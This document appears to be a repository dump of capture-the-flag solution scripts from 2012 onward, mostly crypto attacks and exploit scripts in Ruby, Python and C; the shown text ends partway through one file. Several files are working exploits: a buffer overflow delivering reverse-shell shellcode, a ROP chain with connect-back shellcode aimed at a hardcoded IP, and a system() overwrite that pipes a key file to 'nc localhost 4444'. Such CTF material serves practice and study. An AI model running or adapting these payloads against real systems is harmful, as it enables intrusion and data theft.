├── 2012
    └── pctf
    │   └── encryption_service
    │       └── solve.rb
├── 2013
    ├── asis
    │   └── cryptor
    │   │   └── brute.cpp
    ├── bkp-ctf
    │   └── crypto200
    │   │   ├── Makefile
    │   │   ├── solve.cpp
    │   │   └── solve.py
    ├── csaw
    │   └── fil_chal
    │   │   └── solve.rb
    ├── gits
    │   ├── back2skool
    │   │   └── exploit.rb
    │   ├── funnybusiness
    │   │   └── exploit.rb
    │   └── rabinsbitch
    │   │   ├── crack.c
    │   │   ├── exploit.rb
    │   │   └── solve.py
    ├── pctf
    │   ├── compression
    │   │   └── exploit.rb
    │   └── giga
    │   │   ├── decrypt.py
    │   │   ├── entropy.py
    │   │   └── exploit.py
    ├── pico
    │   └── cbc_server
    │   │   └── solve.rb
    └── secuinside
    │   └── movie_talk
    │       └── exploit.py
├── 2014
    ├── asis
    │   ├── crsh
    │   │   ├── prev_prime.py
    │   │   └── solve.rb
    │   └── random_image
    │   │   └── solve.py
    ├── bkp-ctf
    │   └── hashme
    │   │   ├── extension.py
    │   │   └── solve.rb
    ├── codegate-final
    │   ├── fortune_teller
    │   │   └── exploit.py
    │   └── wsh
    │   │   └── exploit.rb
    ├── codegate
    │   └── clone
    │   │   ├── logs
    │   │   └── solve.py
    ├── defcon
    │   ├── 100lines
    │   │   └── solve.c
    │   ├── nonameyet
    │   │   └── exploit.txt
    │   ├── sftp
    │   │   ├── exploit.rb
    │   │   └── solve.txt
    │   └── turdedo
    │   │   ├── exploit.rb
    │   │   └── solve.txt
    ├── defkthon
    │   └── crypto400
    │   │   └── solve.rb
    ├── hdcon
    │   └── web
    │   │   └── exploit.rb
    ├── hitcon
    │   ├── finger
    │   │   └── exploit.rb
    │   ├── py4h4sher
    │   │   └── stage1.cpp
    │   ├── rsaha
    │   │   └── solve.rb
    │   └── wtf6
    │   │   ├── find_sha1col.cpp
    │   │   └── generate_blocks.rb
    ├── olympic
    │   ├── echof
    │   │   └── exploit.rb
    │   └── mic
    │   │   └── solve.rb
    ├── pctf
    │   ├── graph
    │   │   ├── ciphertext
    │   │   ├── pubkey
    │   │   └── solve.py
    │   ├── kappa
    │   │   └── exploit.rb
    │   └── wheeee
    │   │   ├── crack.c
    │   │   ├── decrypt.py
    │   │   └── extract_data.py
    ├── seccon
    │   ├── BBQR
    │   │   └── solve.py
    │   ├── Choose
    │   │   └── solve.rb
    │   ├── Crypto_Easy
    │   │   ├── factor.rb
    │   │   └── run.c
    │   ├── Crypto_Hard
    │   │   └── decrypt.rb
    │   ├── Ms.Fortune
    │   │   └── solve.rb
    │   └── QR_Easy
    │   │   └── solve.rb
    ├── secuinside
    │   ├── crypto
    │   │   ├── DONE.txt
    │   │   ├── PKI.dis
    │   │   ├── PKI.py
    │   │   ├── pillow_reader.dis
    │   │   └── pillow_reader.py
    │   ├── notes
    │   │   └── exploit.rb
    │   └── shellcode
    │   │   ├── Crc32.cpp
    │   │   ├── Crc32.h
    │   │   ├── ReverseCRC.cpp
    │   │   └── exploit.rb
    └── whitehat
    │   ├── mentalminer
    │       ├── exploit.rb
    │       └── solve.rb
    │   └── ransomware
    │       └── solve.c
├── 2015
    ├── 32c3-ctf
    │   ├── flash
    │   │   └── solve.py
    │   ├── readme
    │   │   └── solve.py
    │   ├── sandbox
    │   │   ├── .gitignore
    │   │   ├── shellcode.S
    │   │   └── solve.py
    │   └── teufel
    │   │   └── solve.py
    ├── bkp-ctf
    │   ├── andrew
    │   │   └── exploit.txt
    │   ├── harvard
    │   │   ├── exploit.rb
    │   │   ├── solve.rb
    │   │   └── time.c
    │   └── wood_island
    │   │   └── dist
    │   │       ├── brute.c
    │   │       └── solve.rb
    ├── codegate
    │   ├── bookstore
    │   │   └── solve.rb
    │   └── steak
    │   │   ├── Makefile
    │   │   ├── exploit.c
    │   │   └── solve.rb
    ├── gits
    │   ├── boxxy
    │   │   ├── shellcode
    │   │   │   ├── extract.rb
    │   │   │   ├── make.sh
    │   │   │   ├── read.s
    │   │   │   ├── read_pipe.s
    │   │   │   ├── write_pipe
    │   │   │   └── write_pipe.s
    │   │   └── solve.rb
    │   └── giggles
    │   │   └── solve.py
    ├── leaveret
    │   └── simple_comment
    │   │   └── solve.py
    └── seccon
    │   ├── fragment2
    │       └── solve.py
    │   ├── syscall_impossible
    │       ├── exploit.py
    │       └── read.S
    │   └── treewalker
    │       └── solve.py
├── 2016
    ├── 0ctf
    │   └── equation
    │   │   ├── .gitignore
    │   │   ├── solve.py
    │   │   └── solve.sh
    ├── h3ctf
    │   ├── aes2
    │   │   └── solve.py
    │   ├── h3_file_check
    │   │   └── solve.py
    │   ├── home_grown_crypto
    │   │   └── solve.c
    │   ├── pydrm
    │   │   └── solve.py
    │   ├── quest
    │   │   └── solve.py
    │   ├── ringworld
    │   │   └── solve.c
    │   └── secure_scada_systems
    │   │   └── solve.py
    └── hitcon
    │   └── SleepyHolder
    │       └── solve.py
├── 2017
    ├── 0ctf
    │   ├── babyheap
    │   │   └── solve.py
    │   ├── enginetest
    │   │   └── solve.py
    │   ├── integrity
    │   │   └── solve.py
    │   ├── otp
    │   │   ├── decrypt.py
    │   │   └── solve.py
    │   └── py
    │   │   └── solve.py
    ├── bkp-ctf
    │   ├── beat_in_the_box
    │   │   └── solve.py
    │   ├── hiddensc
    │   │   ├── solve.py
    │   │   └── try.py
    │   ├── mpc
    │   │   └── solve.py
    │   ├── rsa_buffet
    │   │   └── solve.py
    │   ├── sponge
    │   │   ├── brute.c
    │   │   └── solve.py
    │   └── wackusensor
    │   │   └── solve.py
    └── seccon
    │   ├── README.md
    │   ├── cheer_msg
    │       └── solve.py
    │   ├── jmper
    │       └── exploit.py
    │   ├── lost_decryption
    │       └── solve.py
    │   ├── mboard
    │       └── exploit.py
    │   ├── ropsynth
    │       └── exploit.py
    │   ├── shopping
    │       └── exploit.py
    │   └── vignere
    │       └── solve.py
├── 2018
    ├── defcon
    │   ├── bitflipper
    │   │   └── solve.py
    │   ├── lib
    │   │   ├── pow.c
    │   │   └── pow.py
    │   ├── preview
    │   │   └── solve.py
    │   ├── sbva
    │   │   ├── crawl.py
    │   │   └── solve.py
    │   └── shellme
    │   │   └── solve.py
    ├── hitcon
    │   ├── lost-key
    │   │   └── solve.py
    │   └── lost-modulus
    │   │   └── solve.py
    ├── sctf
    │   ├── BankRobber
    │   │   └── solve.sol
    │   ├── CowBoy
    │   │   └── solve.py
    │   ├── DungeonQuest
    │   │   └── solve.py
    │   ├── HideInSSL
    │   │   └── solve.py
    │   ├── ThroughTheRouter
    │   │   └── solve.py
    │   ├── catch_the_bug
    │   │   └── solve.py
    │   ├── dingJMax
    │   │   └── gdbscript
    │   ├── dvchat
    │   │   └── solve.py
    │   ├── leakit
    │   │   └── solve.py
    │   └── noleak
    │   │   └── solve.py
    └── trendmicro
    │   ├── AuthBreaker
    │       ├── refServer.py
    │       └── solve.py
    │   ├── OceanOfSockets
    │       ├── oceanOfSockets.py
    │       └── solve.py
    │   ├── RSA
    │       └── solve.py
    │   ├── c2coin
    │       └── solve.py
    │   ├── catchme
    │       ├── FAIL
    │       ├── README
    │       ├── filter.py
    │       ├── filter.txt
    │       └── ip.txt
    │   ├── connections
    │       ├── FAIL
    │       ├── certs
    │       │   ├── 1.crt
    │       │   ├── 10.crt
    │       │   ├── 11.crt
    │       │   ├── 12.crt
    │       │   ├── 2.crt
    │       │   ├── 3.crt
    │       │   ├── 4.crt
    │       │   ├── 5.crt
    │       │   ├── 6.crt
    │       │   ├── 7.crt
    │       │   ├── 8.crt
    │       │   └── 9.crt
    │       ├── make_crt.py
    │       └── solve.py
    │   ├── deepdive
    │       ├── extract.py
    │       └── mausoleum.py
    │   ├── fiestel
    │       └── solve.py
    │   ├── filecrypt
    │       └── filecrypt.py
    │   ├── injector
    │       ├── NOTE
    │       ├── inject_code.bin
    │       └── patch.py
    │   └── qrcode
    │       ├── extract.py
    │       ├── qrcode.txt
    │       └── sqrd.py
├── 2019
    ├── 36c3
    │   ├── dumb_theory
    │   │   ├── brute.py
    │   │   └── calc.sage
    │   └── nacht
    │   │   └── solve.py
    └── defcon
    │   └── chainedrsa
    │       ├── Makefile
    │       ├── crack.cpp
    │       ├── crack.py
    │       ├── crawl.py
    │       └── solve.py
├── .gitignore
└── README.md


/.gitignore:
--------------------------------------------------------------------------------
 1 | *.gem
 2 | *.rbc
 3 | /.config
 4 | /coverage/
 5 | /InstalledFiles
 6 | /pkg/
 7 | /spec/reports/
 8 | /test/tmp/
 9 | /test/version_tmp/
10 | /tmp/
11 | 
12 | ## Specific to RubyMotion:
13 | .dat*
14 | .repl_history
15 | build/
16 | 
17 | ## Documentation cache and generated files:
18 | /.yardoc/
19 | /_yardoc/
20 | /doc/
21 | /rdoc/
22 | 
23 | ## Environment normalisation:
24 | /.bundle/
25 | /lib/bundler/man/
26 | 
27 | # for a library or gem, you might want to ignore these files since the code is
28 | # intended to run in multiple environments; otherwise, check them in:
29 | # Gemfile.lock
30 | # .ruby-version
31 | # .ruby-gemset
32 | 
33 | # unless supporting rvm < 1.11.0 or doing something fancy, ignore this:
34 | .rvmrc
35 | 


--------------------------------------------------------------------------------
/2012/pctf/encryption_service/solve.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | require 'openssl'
 3 | 
 4 | class Exploit
 5 |   KEY_SIZE = 29
 6 | 
 7 |   def initialize
 8 |     @s = TCPSocket.new('0.0.0.0', 4433)
 9 |     @ans = ""
10 |   end
11 | 
12 |   def write(data)
13 |     @s.write([data.length].pack('I') + data)
14 |   end
15 | 
16 |   def read()
17 |     length = @s.read(4).unpack('I')[0]
18 |     @s.read(length)
19 |   end
20 | 
21 |   def query(data)
22 |     write(data)
23 |     read()
24 |   end
25 | 
26 |   def sxor(s1, s2)
27 |     s1.each_byte.zip(s2.each_byte).map{|x,y| (x^y).chr}.join
28 |   end
29 | 
30 |   def sxorl(l)
31 |     s = "\x00" * l[0].length
32 |     l.each {|x| s = sxor(s, x) }
33 |     s
34 |   end
35 | 
36 |   def dict
37 |     ('a'..'z').to_a + ['_']
38 |   end
39 | 
40 |   def decrypt()
41 |     iv = @s.read(16)
42 | 
43 |     KEY_SIZE.times do
44 |       append = 15 - (@ans.length % 16)
45 |       prefix = ("a" * append + @ans)[-15..-1]
46 |       block = (@ans.length / 16) * 16
47 | 
48 |       encrypted = query("a" * append)
49 |       standard = encrypted[block..block + 15]
50 |       new_iv = encrypted[-16..-1]
51 | 
52 |       if @ans.length >= 16
53 |         c = @ans.length / 16 - 1
54 |         iv = encrypted[c..c + 15]
55 |       end
56 | 
57 |       dict.each do |ch|
58 |         encrypted = query(sxorl([new_iv, prefix + ch, iv]))
59 |         matching = encrypted[0..15]
60 |         new_iv = encrypted[-16..-1]
61 |         if matching == standard
62 |           @ans += ch
63 |           p @ans
64 |           break
65 |         end
66 |       end
67 | 
68 |       iv = new_iv
69 |     end
70 |   end
71 | end
72 | 
73 | s = Exploit.new
74 | s.decrypt
75 | 
76 | 


--------------------------------------------------------------------------------
/2013/asis/cryptor/brute.cpp:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <string.h>
 4 | #include <time.h>
 5 | 
 6 | using namespace std;
 7 | int bitXor(int, int);
 8 | 
 9 | int check(unsigned char* buffer)
10 | {
11 | 	return buffer[0] == 0x89 && buffer[1] == 0x50 && buffer[2]==0x4e && buffer[3] == 0x47;
12 | }
13 | 
14 | int main(int argc, char **argv)
15 | {
16 | 	srand(time(NULL));
17 | 	char *path=new char[30];
18 | 	char *outPath = new char[30];
19 | 	if(argc > 1)
20 | 		path = argv[1];
21 | 	else
22 | 	{
23 | 		printf("\nenter file\n");
24 | 		scanf("%s",path);
25 | 	}
26 | 	int g = rand() % 512 + 32;
27 | 	int n = rand() % g;
28 | 	int mask = rand() % 256;
29 | 
30 | 	strcpy(outPath, path);
31 | 	strcat(outPath, "_Crypted");
32 | 
33 | 
34 | 	FILE *inFile = fopen(path, "rb");
35 | 	FILE *outFile = fopen(outPath, "wb");
36 | 
37 | 	if(inFile == NULL || outFile == NULL)
38 | 	{
39 | 			printf("Error\ncant read/write file\n");
40 | 			return 1;
41 | 	}
42 | 	unsigned char H, L;
43 | 	unsigned char *readBuffer = new unsigned char[512], *writeBuffer = new unsigned char[512];
44 | 	int len = fread(readBuffer, 1, 512, inFile);
45 | 
46 | 	// assume g > 4
47 | 	for (g = 0; g < 512; g++)
48 | 	{
49 | 			for (n = 0; n < g; n++)
50 | 			{
51 | 					for (mask = 0; mask < 256; mask ++)
52 | 					{
53 | 							for(int i = 0 ; i < g ; i++)
54 | 							{
55 | 									int nIndex = i + n;
56 | 									int pIndex = i - n;
57 | 									if(nIndex >= g) 
58 | 											nIndex -= g;
59 | 									if(nIndex < 0) 
60 | 											nIndex += g;
61 | 									if(pIndex >= g) 
62 | 											pIndex -= g;
63 | 									if(pIndex < 0) 
64 | 											pIndex += g;
65 | 									H = readBuffer[nIndex] / 16;
66 | 									L = readBuffer[pIndex] % 16;
67 | 									writeBuffer[i] = bitXor(16 * H + L, mask);
68 | 							}
69 | 
70 | 							if (check(writeBuffer))
71 | 							{
72 | 									printf("\nsave decryption code: %d.%d.%d\n", g, n, mask);
73 | 							}
74 | 					}
75 | 			}
76 | 	}
77 | }
78 | int bitXor(int x, int y)
79 | {
80 |     int a = x & y;
81 |     int b = ~x & ~y;
82 |     int z = ~a & ~b;
83 |     return z;
84 | }
85 | 


--------------------------------------------------------------------------------
/2013/bkp-ctf/crypto200/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	g++ -o solve solve.cpp -lssl -std=c++0x -lcrypto
3 | 	
4 | 


--------------------------------------------------------------------------------
/2013/bkp-ctf/crypto200/solve.cpp:
--------------------------------------------------------------------------------
 1 | #include <unordered_map>
 2 | #include <string>
 3 | #include <openssl/aes.h>
 4 | #include <stdint.h>
 5 | #include <string.h>
 6 | 
 7 | using namespace std;
 8 | 
 9 | void set_key(uint8_t* key, int value)
10 | {
11 | 	int i;
12 | 	key[29] = value & 0xff;
13 | 	key[30] = (value >> 8) & 0xff;
14 | 	key[31] = (value >> 16) & 0xff;
15 | }
16 | 
17 | int main()
18 | {
19 | 	unordered_map<string, int> table;
20 | 	int i, j;
21 | 	uint8_t key[32], m1[16], m2[16], e1[16], e2[16], out[16], target[32], immediate[32], answer[33];
22 | 	AES_KEY enc_key, dec_key;
23 | 	string decrypted;
24 | 
25 | 	// set initial value
26 | 	memcpy(m1, "AES-256 ECB mode", 16);
27 | 	memcpy(m2, "Each key zero un", 16);
28 | 	memcpy(e1, "Lv\xe9\x07\x86\xc4\xf3""dj\xdf\x99!zd\xd0\xd7", 16);
29 | 	memcpy(e2, "\xd3V\x19m*\xedkc~\xd6\x93\x9e""B\x9a""f<", 16);
30 | 	memcpy(target, "\xb3\x98]\xd1""8S\x92\xfdT\xe3\x8a\xfdi\x1c\x94\x85\xa5\xf9\xa8\x97\xb9\xebS\x19\xd7\xad;\xd6yo3\xd5", 32);
31 | 
32 | 	memset(key, 0, sizeof(key));
33 | 	
34 | 	for (i = 0; i < 0xffffff; i++)
35 | 	{
36 | 		set_key(key, i);
37 | 		AES_set_encrypt_key(key, 256, &enc_key);
38 | 		AES_encrypt(m1, out, &enc_key);
39 | 		table[string((char*)out, 16)] = i;
40 | 	}
41 | 
42 | 	for (i = 0; i < 0xffffff; i++)
43 | 	{
44 | 		set_key(key, i);
45 | 		AES_set_decrypt_key(key, 256, &dec_key);
46 | 		AES_decrypt(e1, out, &dec_key);
47 | 		decrypted = string((char*)out, 16);
48 | 		
49 | 		if (table.find(decrypted) != table.end())
50 | 		{
51 | 				printf("[*] Candidate is found\n");
52 | 				printf("[*] key1 : %d, key2 : %d\n", i, table[decrypted]);
53 | 				
54 | 				// Decrypt answer
55 | 				memset(answer, 0, sizeof(answer));
56 | 
57 | 				set_key(key, i);
58 | 				AES_set_decrypt_key(key, 256, &dec_key);
59 | 				for (j = 0; j < 2; j++)
60 | 					AES_decrypt(target + 16 * j, immediate + 16 * j, &dec_key);
61 | 
62 | 				set_key(key, table[decrypted]);
63 | 				AES_set_decrypt_key(key, 256, &dec_key);
64 | 				for (j = 0; j < 2; j ++)
65 | 						AES_decrypt(immediate + 16 * j, answer + 16 * j, &dec_key);			
66 | 
67 | 				printf("[*] Answer : %s\n", answer);
68 | 
69 | 		}
70 | 	}
71 | }
72 | 


--------------------------------------------------------------------------------
/2013/bkp-ctf/crypto200/solve.py:
--------------------------------------------------------------------------------
 1 | from Crypto.Cipher import AES
 2 | import base64, struct, sys
 3 | 
 4 | table = {}
 5 | 
 6 | m1 = base64.b64decode("QUVTLTI1NiBFQ0IgbW9kZSB0d2ljZSwgdHdvIGtleXM=")[0:16]
 7 | e1 = base64.b64decode("THbpB4bE82Rq35khemTQ10ntxZ8sf7s2WK8ErwcdDEc=")[0:16]
 8 | m2 = base64.b64decode("RWFjaCBrZXkgemVybyB1bnRpbCBsYXN0IDI0IGJpdHM=")[0:16]
 9 | e2 = base64.b64decode("01YZbSrta2N+1pOeQppmPETzoT/Yqb816yGlyceuEOE=")[0:16]
10 | target = base64.b64decode("s5hd0ThTkv1U44r9aRyUhaX5qJe561MZ16071nlvM9U=")
11 | 
12 | def give_key(i):
13 | 	key = "\x00"*29 + struct.pack('>I', i)[1:]
14 | 	return key
15 | 
16 | brute_range = 0xffffff
17 | 
18 | for i in xrange(brute_range):
19 | 		key = give_key(i)
20 | 		cipher = AES.new(key)
21 | 		table[cipher.encrypt(m1)] = i
22 | 		if i % 0x10000 == 0:
23 | 			print hex(i)
24 | 
25 | print "[*] Constructing a table is completed."
26 | 
27 | for i in xrange(brute_range):
28 | 		key = give_key(i)
29 | 		cipher = AES.new(key)
30 | 		decrypted_text = cipher.decrypt(e1)
31 | 		if table.has_key(decrypted_text):
32 | 				key1 = key
33 | 				key2 = give_key(table[decrypted_text])
34 | 
35 | 				print "[*] key1 : " + repr(key1)
36 | 				print "[*] key2 : " + repr(key2)
37 | 
38 | 				c1 = AES.new(key1)
39 | 				c2 = AES.new(key2)
40 | 
41 | 				if (c1.decrypt(e2) != c2.encrypt(m2)):
42 | 						continue
43 | 
44 | 				print "[*] Answer : " + c2.decrypt(c1.decrypt(target))
45 | 
46 | 		if i % 0x10000 == 0:
47 | 			print hex(i)
48 | 


--------------------------------------------------------------------------------
/2013/csaw/fil_chal/solve.rb:
--------------------------------------------------------------------------------
 1 | #encoding: BINARY
 2 | require 'socket'
 3 | 
 4 | ret = 0xbfe29e90
 5 | counter = 0
 6 | 
 7 | loop do
 8 |   s = TCPSocket.new('0.0.0.0', 34266)
 9 |   t = Thread.new do |t|
10 |     loop do
11 |       s.recv(0x1000)
12 |     end
13 |   end
14 | 
15 |   sc = "\x68\x8f\xf8\x02\x0D\x5e\x66\x68\xd9\x03\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xce"
16 | 
17 |   s.write("csaw2013")
18 |   s.write("S1mplePWD")
19 |   s.write(0xffff)
20 | 
21 |   s.write("\x80"*0x425 + [ret].pack("<I") + "\x90" * 500 + sc)
22 |   sleep(0.5)
23 |   s.close()
24 |   t.exit
25 | 
26 |   ret -= 0x1000
27 |   counter += 1
28 |   puts "Current : #{ret.to_s(16)}" if counter % 10 == 0
29 | end
30 | 


--------------------------------------------------------------------------------
/2013/gits/back2skool/exploit.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | 
 3 | class Back2skoolExploit
 4 | 	def initialize(ip, port)
 5 | 		@s = TCPSocket.new(ip, port)
 6 | 	end
 7 | 
 8 | 	def welcome
 9 | 		21.times { puts @s.readline }
10 | 	end
11 | 
12 | 	def read position
13 | 		@s.puts "read"
14 | 		puts @s.readline
15 | 		@s.puts position
16 | 		puts @s.readline
17 | 	end
18 | 
19 | 	def write position, value
20 | 		@s.puts "write"
21 | 		puts @s.readline
22 | 		@s.puts position
23 | 		
24 | 		received = @s.readline
25 | 		puts received
26 | 		if not received.index "Table index too large!"
27 | 			@s.puts value
28 | 			puts @s.readline
29 | 		end
30 | 	end
31 | 
32 | 	def values_string str
33 | 		str += "\x00" * (4 - (str.length % 4)) if str.length % 4 != 0
34 | 		values str.scan(/..../).map{|v| v.unpack("<I")[0]}
35 | 	end
36 | 
37 | 	def values list
38 | 		if list.length > 10
39 | 			puts "[*] values : # of argument must be less than 10"
40 | 		end
41 | 		
42 | 		list.each_with_index do |x, y|
43 | 			write y, x
44 | 		end
45 | 	end
46 | 
47 | 	def overwrite_math v
48 | 		write -2147483634, v 
49 | 	end
50 | 
51 | 	def send_change
52 | 		list = [0x0804c074, 0x41414141, 0x08049bfc, 50, 0]
53 | 		values list
54 | 	end
55 | 
56 | 	def doit
57 | 		@s.puts "math"
58 | 		puts @s.readline
59 | 	end
60 | 
61 | 	def read_libc_start_main
62 | 		read -41
63 | 	end
64 | 
65 | 	def exploit
66 | 		libc_start_main = 0xB75953E0
67 | 		system_offset = 0x26050
68 | 		system = libc_start_main + system_offset
69 | 		system = -1218726864
70 | 		
71 | 		welcome
72 | 		overwrite_math system
73 | 		values_string "cat key|nc localhost 4444\x00"
74 | 
75 | 		pause
76 | 		doit
77 | 	end
78 | 	
79 | 	def pause
80 | 		STDIN.readline
81 | 	end
82 | end
83 | 
84 | 
85 | 
86 | 
87 | exploit = Back2skoolExploit.new('localhost', 31337)
88 | exploit.exploit
89 | 


--------------------------------------------------------------------------------
/2013/gits/funnybusiness/exploit.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | 
 3 | class FunnyBusinessExploit
 4 | 	def initialize(ip, port)
 5 | 		@s = TCPSocket.new(ip, port)
 6 | 	end
 7 | 
 8 | 	def send_data data
 9 | 		p data, data.length
10 | 		@s.print([data.length].pack('<I'))
11 | 		@s.print(data)
12 | 	end
13 | 
14 | 	def pause
15 | 		STDIN.readline
16 | 	end
17 | 
18 | 	def send data
19 | 		@s.print data
20 | 	end
21 | end
22 | 
23 | exploit = FunnyBusinessExploit.new '5.9.0.122', 49681
24 | exploit.pause
25 | 
26 | prefix = "\x78\x9c\x4b\x64\x00\x00\x00\xc4\x00\x62" + "AAA"
27 | shellcode = "\x6a\x66\x58\x99\x89\xd3\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc3\x89\xd1\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x52\x52\x68\x7f\x00\x00\x01\x66\xb9\x11\x5c\xc1\xe1\x10\xb1\x02\x51\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb3\x03\xb0\x66\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xd1\xcd\x80"
28 | 
29 | # recv buffer with size -> jump to buffer
30 | buffer = 0x0804B0A0
31 | recv_plt = 0x080487B0
32 | pppr = 0x08048BBE
33 | 
34 | payload = [recv_plt, buffer, 0x4, buffer, shellcode.length, 0]
35 | exploit.send_data prefix + payload.pack('<I*')
36 | exploit.send shellcode
37 | 


--------------------------------------------------------------------------------
/2013/gits/rabinsbitch/crack.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | #include <openssl/sha.h>
 4 | int main(int argc, char** argv)
 5 | {
 6 | 		unsigned char ibuf[21];
 7 | 		unsigned char obuf[20];
 8 | 		unsigned int i, j;
 9 | 		memset(ibuf, 0, sizeof(ibuf));
10 | 		memcpy(ibuf, argv[1], 16);
11 | 
12 | 		for(i = 0; i < 0xffffffff; i++)
13 | 		{
14 | 				*(int*)(ibuf + 17) = i;
15 | 				for(j = 0; j < 256; j++)
16 | 				{
17 | 						*(ibuf + 16) = j;
18 | 
19 | 						SHA1(ibuf, sizeof(ibuf), obuf);
20 | 
21 | 						if(obuf[19] == 0xff && obuf[18] == 0xff && obuf[17] == 0xff && (obuf[16] & 3) == 3)
22 | 						{
23 | 								for (i = 0; i < 21; i++) {
24 | 										printf("%02x", ibuf[i]);
25 | 								}
26 | 
27 | 								return;
28 | 						}
29 | 				}
30 | 		}
31 | 
32 | 		printf("Cannot find");
33 | }
34 | 
35 | 


--------------------------------------------------------------------------------
/2013/gits/rabinsbitch/exploit.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | require 'digest'
 3 | require 'shellwords'
 4 | 
 5 | def int2str(value, maxlen = 5)
 6 | 	output = ""
 7 | 	maxlen.times do |x|
 8 | 		output += (value & 0xff).chr
 9 | 		value >>= 8
10 | 	end
11 | 	output
12 | end
13 | 
14 | def find_proof(salt)
15 | 	range = 0x10000000000
16 | 	range.times do |x|
17 | 		hash = Digest::SHA1.hexdigest(salt + int2str(x))
18 | 		if hash[-1] == 0xff and hash[-2] == 0xff and hash[-3] == 0xff and (hash[-4] & 3) == 3
19 | 			return int2str(x)
20 | 		end
21 | 	end 
22 | 
23 | 	print "Cannot Found!"
24 | 	return nil
25 | end
26 | 
27 | s = TCPSocket.open('localhost', 9955)
28 | d = s.recv(0x1000)
29 | salt = d[-16..-1]
30 | puts "salt : #{salt}"
31 | result = `./crack #{Shellwords.escape(salt)}`
32 | 
33 | exit() if result.index("Cannot find") 
34 | 
35 | result = result.scan(/../).map{|v| v.to_i(16).chr}.join
36 | p result
37 | puts "cracked : #{result}"
38 | 
39 | s.print(result)
40 | s.print("\x01\x00")
41 | s.print("\x03")
42 | 
43 | 100.times do |x|
44 | 	output = s.recv(0x1000)
45 | 	p output
46 | end
47 | 


--------------------------------------------------------------------------------
/2013/gits/rabinsbitch/solve.py:
--------------------------------------------------------------------------------
 1 | import hashlib
 2 | from fractions import gcd
 3 | 
 4 | s=[10534507894435094283197793300032945602560268068223645663197778828494639978772036893142406549850519340528703180135593990239498710391090719130787423122366493694377922581193388712662207054611077859448315310040243207055284548615818735997840764919875101023317023776468292830253327980921333686259820913048943634001275087328409739765878921901210555340267341780309589139026899506850119234108335451398955010218882101669318907402336695669013214284445661014242431826284074206364428546679950251674071684157522443850624144263210275534535062050106375408712463405749530141015177710546541155350339393849360122013932770099100590040759,11960012029928563119074051489670998262109480084403357491694556295543529009779904484438527917008225175426032128855042875865586538589195435030198860715975411379814951339166534885425250269238079693699485102510079014339543296760377314897332104903333552410078653357527133150610598428684376734746819257356090483178188738737255170756528663000020247991778374820786536763675232840321780447305295690166263494334240804187229047340397563830327211215014769228487362420432998359202456907347443873518921202920400590169731419624969225445488663654013000875574871590171410027192457073032978749222847720325484653551284939429804883883926,6773978608203659940397183370779778947480120169107507058585829396148271938793521753056960062097990230837266294259963844631341860118114555541248081541892533261014094802160567831589300558174525238857769466683616973156620724703340885433290703334965877476650973227624963827264479464779091441720952632034329122384314637730509685219716359684655379017435356726394118498077933741428185941532668298626757301753756637168295195952720309222718245527697802427695651805804790521982097337511834327542094375187464891196864124915430627475357233900908498884347680986875535900867830093091320328198623444667858248054921969374079264070963,8199482743697128776273441560417831607029332185287218887082606863197160969801389344353081429255696065734595242979412730257429688316219271440659519135501450946451123560133714004352343772801527073108939259153452780440879472847899464332782043318424328863412602808683804147621749912542134490207950976341475971561228289139355116210366100783465071668946389766871066122726267074899847154729628537394065785869115339686205335890781177384032242458266910641940582399953714674820125698179327949386943893950343037515971400277189577386310835504815124351210089171297415787045109455577757922071131771143982779592274138704783557914130]
 5 | diff = []
 6 | 
 7 | n = s[0] + s[3]
 8 | gcds = []
 9 | 
10 | for i in xrange(len(s)):
11 | 	for j in xrange(i + 1, len(s)):
12 | 		diff.append(max(s[i], s[j]) - min(s[i], s[j]))
13 | 
14 | for i in xrange(len(diff)):
15 | 	for j in xrange(i+1, len(diff)):
16 | 		gcds.append(gcd(n,diff[j]))
17 | 
18 | sets = set(gcds)
19 | 
20 | p = 0
21 | q = 0
22 | 
23 | for x in sets:
24 | 	if q < x:
25 | 		p = q
26 | 		q = x
27 | 	elif p < x:
28 | 		p = x
29 | 
30 | sha1 = hashlib.sha1()
31 | sha1.update("%d%d" % (p,q))
32 | print sha1.hexdigest()
33 | 


--------------------------------------------------------------------------------
/2013/pctf/compression/exploit.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | 
 3 | class CompExploit
 4 | 	def initialize
 5 | 		@s = TCPSocket.new('localhost', 4433)
 6 | 		@charset = ('a'..'z').to_a + ['_']
 7 | 		@key = "do_you_know_about_crime"
 8 | 	end	
 9 | 
10 | 	def get_nonce
11 | 		@nonce = @s.recv(8)
12 | 		p @nonce
13 | 	end
14 | 
15 | 	def get_length data
16 | 		length = [data.length].pack("I")
17 | 		@s.print(length)
18 | 		@s.print(data)
19 | 		length = @s.recv(4).unpack("I")[0]
20 | 		@s.recv(length)
21 | 		return length
22 | 	end
23 | 
24 | 	def get_bytes c
25 | 			bytes = ""	
26 | 			min = 0x100000000
27 | 			c.each do |key,value|
28 | 					min = value if value < min
29 | 			end
30 | 
31 | 			c.each do |key,value|
32 | 					bytes += key if min == value
33 | 			end
34 | 
35 | 			puts "Cannot Find" if bytes.length == 0 
36 | 			puts "Multiple Find : #{bytes}" if bytes.length > 1
37 | 			bytes
38 | 	end
39 | 
40 | 	def get_first_byte
41 | 		first_byte = ""
42 | 		c = {} 
43 | 		@charset.each do |x|
44 | 			c[x] = get_length(x * 10)
45 | 		end
46 | 
47 | 		first_byte = get_bytes(c)
48 | 		@key += first_byte
